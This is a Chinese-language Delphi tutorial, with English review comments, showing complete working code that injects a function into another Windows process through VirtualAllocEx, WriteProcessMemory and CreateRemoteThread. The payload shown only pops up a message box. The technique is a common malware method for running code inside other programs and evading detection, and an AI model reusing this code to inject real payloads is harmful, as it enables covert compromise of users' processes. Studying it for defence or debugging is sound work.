用createRemoteThread远程注入(非DLL插入)

DELPHI代码,直接注入别的进程,之后直接运行在别的进程中的代码!
效果是弹出一个确认框!

本方法不能在98系统下使用!

// Prototype of the Win32 API the example calls (as imported by the Delphi Windows unit).
// hProcess: handle of the target process — btnInjectClick passes the OpenProcess result.
// lpThreadAttributes: security descriptor for the new thread; nil selects the default.
// dwStackSize: stack size; 0 selects the target process's default.
// lpStartAddress: address, inside the target, at which the thread starts executing.
// lpParameter: address, inside the target, of the argument handed to that function.
// dwCreationFlags: creation flags.
// lpThreadId: receives the id of the created thread.
// Returns the thread handle (0 on failure; the caller should check before waiting on it).
function createRemoteThread(hProcess: THandle; lpThreadAttributes: Pointer;
  dwStackSize: DWORD; lpStartAddress: TFNThreadStartRoutine; lpParameter: Pointer;
  dwCreationFlags: DWORD; var lpThreadId: DWORD): THandle; stdcall;

第一个参数:目标行程 ID
第二个参数:指定 SD (security descriptor), nil 表示使用预设 SD
第三个参数:堆叠大小, 0 表示使用目标行程预设堆叠大小
第四个参数:开始执行函数的位址
第五个参数:餵进上面函数参数的位址
第六个参数:旗标设定
第七个参数:回传成功后產生的 Thread ID

接着来说明一下,使用流程吧..

1. 取得目标 Process ID (用 FindWindow+GetWindowThreadProcessId or createToolhelp32Snapshot)
2. OpenProcess 并设定 PROCESS_ALL_ACCESS (懒,用这最方便)
3. 使用 VirtualAllocEx 在目标行程内要求两块可执行可读写的空间,一块放函数,另一块放参数
4. 使用 WriteProcessMemory 将函数和参数写进刚刚要求的两块空间
5. 准备完毕,createRemoteThread
6. WaitForSingleObject (等待 Thread 结束)
7. VirtualFreeEx 释放刚刚要求的两块位址

需小心的地方:
1. 别使用 VCL, 连 string 也不能用.
2. 在目标行程执行的程式,无法直接使用 API, 需由 LoadLibraryA & GetProcAddress 来动态载入 dll 来使用 API。但是所有 kernel32.dll 的函数可直接使用, 因為每个行程必定会载入这个 dll, 所以可由本地行程先找好 LoadLibraryA & GetProcAddress 的函数位址,然后塞进参数内
3. 在目标行程执行的程式,如果用到字串的话,要小心! 不可直接用, 需将要使用的字串先写入到参数中
4. 很想用 VCL 的话,在目标行程执行的程式就直接载入一个用 delphi 写的 dll 吧 XD

最后,以一个例子当结尾
简单在指定的 Process 秀出一个 MessageBox..
使用了 FindWindow+GetWindowThreadProcessId 取得目标 Process Id

1. 要在目标行程内执行的程式

// Code that runs inside the target process. btnInjectClick copies its bytes
// into the target verbatim, so the body must not depend on anything outside
// itself: no VCL, no string type, no direct API imports (see the cautions
// above) — everything it needs arrives through param.
// param: pointer to the TParam block the injector wrote into the target,
//   holding the LoadLibraryA/GetProcAddress addresses and two NUL-terminated
//   ANSI strings (the DLL name and the export name).
// Loads the DLL named in param^.sUser, resolves the export named in
// param^.sMessage from it, and calls it as MessageBoxA(0, sUser, sMessage, MB_OK).
// Addresses and module handles are carried as DWORD, so this is 32-bit only.
procedure myMessageBegin(param: PParam); stdcall;
type
  // Function-pointer types matching the stdcall signatures of the three APIs used.
  LoadLibraryFunc = function(lib: PChar): DWORD; stdcall;
  GetProcAddressFunc = function(lib: DWORD; name: PChar): DWORD; stdcall;
  MessageBoxFunc = function(handle: DWORD; msg, title: PChar; flag: DWORD): DWORD; stdcall;
var
  myLoad: LoadLibraryFunc;
  myGetProc: GetProcAddressFunc;
  myMsg: MessageBoxFunc;
  hlib: DWORD;
begin
  // The injector resolved these in its own process; the page relies on
  // kernel32 exports having the same address in every process.
  // NOTE(review): that holds only for processes sharing one kernel32 base —
  // confirm on the target OS before relying on it.
  myLoad := LoadLibraryFunc(param^.fLoadLibrary);
  myGetProc := GetProcAddressFunc(param^.fGetProcAddress);
  hlib := myLoad(@param^.sUser[0]);                                 // 'user32.dll'
  myMsg := MessageBoxFunc(myGetProc(hlib, @param^.sMessage[0]));    // 'MessageBoxA'
  // No result checks: if the load or the lookup returned 0, this calls through 0.
  myMsg(0, @param^.sUser[0], @param^.sMessage[0], MB_OK);
end;

看的出来,写的相当迂迴

2. 注入函数的参数型别定义

// Parameter block handed to the injected myMessageBegin (btnInjectClick copies
// it into the target process with WriteProcessMemory).
// To call MessageBox the injected code must first LoadLibrary user32.dll and
// then GetProcAddress the MessageBox entry, so the block carries those two
// kernel32 addresses plus the two name strings — it cannot use its own
// string literals because they would not be copied along with the code.
// PS: the page relies on system DLL export addresses being identical in every
// process, and on every process having kernel32.dll loaded, which is why the
// injector resolves LoadLibrary & GetProcAddress up front in its own process.
PParam = ^TParam;
TParam = packed record
  fLoadLibrary: DWORD;              // address of kernel32!LoadLibraryA (32-bit)
  fGetProcAddress: DWORD;           // address of kernel32!GetProcAddress (32-bit)
  sUser: array[0..10] of Char;      // 'user32.dll' (10 chars) + NUL: fills all 11 bytes
  sMessage: array[0..11] of Char;   // 'MessageBoxA' (11 chars) + NUL: fills all 12 bytes
  // The terminating NULs come from the injector's FillChar; there is no spare room.
end;

3. 注入的程式

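// Click handler: injects myMessageBegin into the process that owns the window
// titled edtName.Text and runs it on a remote thread (the step list above).
// Sender: the VCL control that raised the click; unused.
//
// Resource handling: every exit path releases what was acquired so far — the
// process handle, the remote thread handle (the original never closed it),
// and both VirtualAllocEx regions. The regions are freed with MEM_RELEASE and
// size 0, which also returns the reserved address range; MEM_DECOMMIT, as the
// original used, left the reservation behind in the target process.
// Failures of WriteProcessMemory and createRemoteThread are now reported
// instead of waiting INFINITE on an invalid handle.
//
// Relies on myMessageBegin/myMessageEnd (defined elsewhere in the unit) being
// laid out contiguously so that their address difference is the code size.
// NOTE(review): allocate-executable + WriteProcessMemory + createRemoteThread
// into a foreign process is the textbook remote-thread injection sequence;
// endpoint defenses monitor exactly this API chain, so expect it to be flagged.
procedure TForm1.btnInjectClick(Sender: TObject);
var
  hwin, pid: DWORD;
  hprocess: DWORD;
  param: TParam;
  pparam, pfunc: Pointer;
  hlib: DWORD;
  hthread: DWORD;
  s: string;
  v: DWORD;
  iSize: DWORD;
begin
  // Locate the target window by its title.
  hwin := FindWindow(nil, PChar(edtName.Text));
  if hwin = 0 then begin
    MessageBox(self.Handle, '找不到指定的视窗!', '讯息', MB_OK or MB_ICONWARNING);
    Exit;
  end;
  // Resolve the process that owns the window.
  GetWindowThreadProcessId(hwin, pid);
  if pid = 0 then begin
    MessageBox(self.Handle, '找不到行程ID', '讯息', MB_OK or MB_ICONWARNING);
    Exit;
  end;
  // Open the process with full access.
  hprocess := OpenProcess(PROCESS_ALL_ACCESS, False, pid);
  if hprocess = 0 then begin
    MessageBox(self.Handle, '无法开啟行程', '讯息', MB_OK or MB_ICONWARNING);
    Exit;
  end;
  // From here on the finally block owns cleanup; nil/0 means "not acquired".
  pparam := nil;
  pfunc := nil;
  hthread := 0;
  try
    // Parameter block inside the target process.
    pparam := VirtualAllocEx(hprocess, nil, SizeOf(param), MEM_COMMIT, PAGE_READWRITE);
    if pparam = nil then begin
      MessageBox(self.Handle, '要求参数记忆体失败', '讯息', MB_OK or MB_ICONWARNING);
      Exit;
    end;
    // Code region inside the target process. The size is the distance to the
    // empty marker procedure myMessageEnd that follows myMessageBegin.
    iSize := DWORD(@myMessageEnd)-DWORD(@myMessageBegin)+1;
    pfunc := VirtualAllocEx(hprocess, nil, iSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if pfunc = nil then begin
      MessageBox(self.Handle, '要求函数记忆体失败', '讯息', MB_OK or MB_ICONWARNING);
      Exit;
    end;
    // Build the parameter block. FillChar zeroes it first, which supplies the
    // NUL terminators: both strings fill their arrays exactly.
    FillChar(param, SizeOf(param), 0);
    hlib := GetModuleHandle('Kernel32.dll');
    param.fLoadLibrary := DWORD(GetProcAddress(hlib, 'LoadLibraryA'));
    param.fGetProcAddress := DWORD(GetProcAddress(hlib, 'GetProcAddress'));
    s := 'user32.dll';
    Move(s[1], param.sUser[0], Length(s));
    s := 'MessageBoxA';
    Move(s[1], param.sMessage[0], Length(s));
    // Copy parameters, then code. A failed or short write must not be run:
    // the remote thread would execute whatever the region happened to hold.
    if (not WriteProcessMemory(hprocess, pparam, @param, SizeOf(param), v)) or (v <> SizeOf(param)) then begin
      MessageBox(self.Handle, '写入参数失败', '讯息', MB_OK or MB_ICONWARNING);
      Exit;
    end;
    if (not WriteProcessMemory(hprocess, pfunc, @myMessageBegin, iSize, v)) or (v <> iSize) then begin
      MessageBox(self.Handle, '写入函数失败', '讯息', MB_OK or MB_ICONWARNING);
      Exit;
    end;
    // Everything is in place: start the remote thread at pfunc with pparam.
    hthread := createRemoteThread(hprocess, nil, 0, pfunc, pparam, 0, v);
    if hthread = 0 then begin
      MessageBox(self.Handle, '建立远端执行绪失败', '讯息', MB_OK or MB_ICONWARNING);
      Exit;
    end;
    // The regions must stay mapped until the thread has finished using them.
    WaitForSingleObject(hthread, INFINITE);
  finally
    if hthread <> 0 then
      CloseHandle(hthread);
    if pfunc <> nil then
      VirtualFreeEx(hprocess, pfunc, 0, MEM_RELEASE);
    if pparam <> nil then
      VirtualFreeEx(hprocess, pparam, 0, MEM_RELEASE);
    CloseHandle(hprocess);
  end;
end;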